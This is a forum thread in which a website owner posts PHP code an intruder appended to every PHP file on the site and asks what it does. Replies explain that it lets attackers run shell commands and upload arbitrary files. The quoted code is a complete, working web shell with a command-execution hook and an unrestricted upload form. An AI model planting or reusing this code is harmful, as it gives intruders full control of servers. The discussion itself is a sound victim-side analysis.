Dear friends, someone hacked my web server and put the following code at the end of every PHP file of my site. Can you tell me what is the meaning of this code or what is done by this code? Thanks <?php $cmd = <<<EOD cmd EOD; if(isset($_REQUEST[$cmd])) { system($_REQUEST[$cmd]); } ?> <?php if($_GET['id']=='divakar') { echo 'rummykhan<br>'; echo '<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; } else { echo '<b>Upload !!!</b><br><br>'; } } } ?> PHP:
It lets them upload files and execute shell commands. They can do pretty much whatever they want to your site now.
dear @xtmx , Can you tell me where they uploading files; there is no email address or ftp info. Does this piece of code related with other codes; I mean have there any other pieces of codes related with it?
They upload files to the same directory as the file the code is present in - if that's not allowed (ie, if the directory in question doesn't allow writing of files), you're fine - most likely, though, the PHP-user has every right to write files, hence you're a bit screwed (potentially).
As far as you are not checking what kind of uploading file is, so user can upload any binary file and call it whenever he/she want. Look at this code: copy($_FILES['file']['tmp_name'], $_FILES['file']['name']) PHP: File is coping as user desired file name so he know the URL of the file and if the file holds binary code that can extract your DB info, then my man your are really screwed